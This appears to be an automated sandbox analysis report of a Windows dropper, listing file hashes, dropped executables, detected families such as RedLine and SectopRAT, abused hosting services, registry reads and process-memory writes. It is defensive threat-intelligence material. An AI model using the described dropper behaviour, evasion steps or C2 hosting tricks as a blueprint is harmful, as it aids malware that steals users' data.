SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\JCHs.E3

MD5 7aad44a615f35576537f18bc8e823d26
SHA1 21a8f1bcc61e36a79a97a54fb752d1b9a87c6540
SHA256 94daf21f3acccaac80f7ef61b388d8fd3cc5681fa83e1cc064b53b3cc6099875
SHA512 fdca0f0dcc406d4e42fe7309b0e2f1ba68698c4091aa03dfd47a5c6c418c5c77dece4d842e33b316a104109a234abc91223c18a8540f3154ce405d4b70b1c7f3

C:\Users\Admin\AppData\Local\Temp\umd2y.O

MD5 8a433011586f38b7ae7d9d59e9b94716
SHA1 d5a9e96ad6e4be47032a5114cd4a2bf86aace7fa
SHA256 d44545515fa8777d66d4f7a92c4b0e023068a8de265dcbe2c4c05240f8647643
SHA512 1d9c9ef6218b005259e76d557f1d5663aae25ddf6d777ff031392f0b45adf9c1a88002f9a53b21046a17342371dfe2859f0872d7bd05be9d4f5d80cb326d48b4

C:\Users\Admin\AppData\Local\Temp\O99N0.MK

MD5 e263d254e071bc2cd81255fb7b632ec0
SHA1 d4d661ec5ee56ff94ef28e6c3fb7a8e6ebedda76
SHA256 ae727edc4e1cd237810ac1a18a62f9a35d569799af21a9fe74e20de667350e2d
SHA512 a560e5a875d29abe3ff71690346cd79bdb6707e9b58b403e5f662af36b9d76fb9e473784fa8dbdfd476bcc0ab881b4b1a58922059b1df3fdac197e758e84e8c6

C:\Users\Admin\AppData\Local\Temp\nGSPte2.3uY

MD5 0e794635fe380bf7013975be43e6328d
SHA1 dbc56e900a0908fcbb8b92625707d639a2913013
SHA256 4becf7472a4dab6773d38b7c0909e5cd8475d7d2ee069e29d1dd1e277da6d996
SHA512 2cec777557f5126dae3cd58ac2f5535ab3b6495ae97617d8132de8a8478efaad78b27383f197890b9117f8979fd145bdd1801a9068779ca8ab2ff416c898ffd5

C:\Users\Admin\AppData\Local\Temp\7bHI9XPy.U

MD5 ab7ba2d954dd4165d758842d65e19c88
SHA1 f54810c285d0947558a57db880cf592c8d910912
SHA256 85153d59f92c33344f4f25213c7f49323b27b0113b1c2ffd999ee2b06d667d18
SHA512 ba54de0b81d098bbeb40a1e92b049afc9f43c4b593fc36553d5324d14a3ccd768fe062dff408425c4d9f6e959a277bfe1c85bd37fb66c52838cb3d8e606fc9f1

C:\Users\Admin\AppData\Local\Temp\M4WxZZ.Y

MD5 501bcc418508459e43a7f39caf903ed6
SHA1 148de7dcfe55e801812dab263e0c250d76c89082
SHA256 e74889dfadb114ba77c4b0f722bbd30f7a22b87eabf7b152dd99276846e3e086
SHA512 e5adfc985aff5a947157a2a0d8762bc7d44cdaac01cfe729c48199c1a8fa53ff3b5e891116ed76dbaf7c3d56d4888d519d783ff8e0d8852a824cddca1fa2a7e2

memory/1304-269-0x0000000000400000-0x0000000002F21000-memory.dmp

memory/1748-270-0x0000000003040000-0x00000000030E5000-memory.dmp

memory/1748-274-0x00000000030F0000-0x0000000003182000-memory.dmp

memory/1748-271-0x00000000030F0000-0x0000000003182000-memory.dmp

memory/4056-275-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2672-276-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1748-277-0x0000000000400000-0x0000000000597000-memory.dmp

memory/1304-278-0x0000000000400000-0x0000000002F21000-memory.dmp

memory/1748-285-0x00000000030F0000-0x0000000003182000-memory.dmp

memory/1748-286-0x0000000003190000-0x0000000004C6C000-memory.dmp

memory/1748-287-0x0000000004C70000-0x0000000004CFC000-memory.dmp

memory/1748-288-0x0000000004D00000-0x0000000004D86000-memory.dmp

memory/1748-291-0x0000000004D00000-0x0000000004D86000-memory.dmp

memory/1748-292-0x0000000000880000-0x0000000000881000-memory.dmp

memory/1748-293-0x0000000000890000-0x0000000000894000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-23 20:56

Reported

2024-11-23 20:58

Platform

win7-20241010-en

Max time kernel

119s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed227d9e0c1976ea6dc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22293324c9c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed220fb9dde4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22168eb266d7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22269ff37e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RuA3KQICsIEnUTi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22add6199f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22ac1480b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed228eebd341673e072.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2255741b48dffd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22988be99e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-VEK18.tmp\Wed228eebd341673e072.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed22d8c4cdc4a5a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QHDG7.tmp\Wed228eebd341673e072.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed2235e1e9c9640.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed224fff3f809a1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\Wed227d9e0c1976ea6dc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2820 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 752 wrote to memory of 1168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2556 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1784 N/A C:\Users\Admin\AppData\Local\Temp\7zS40BCF6C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
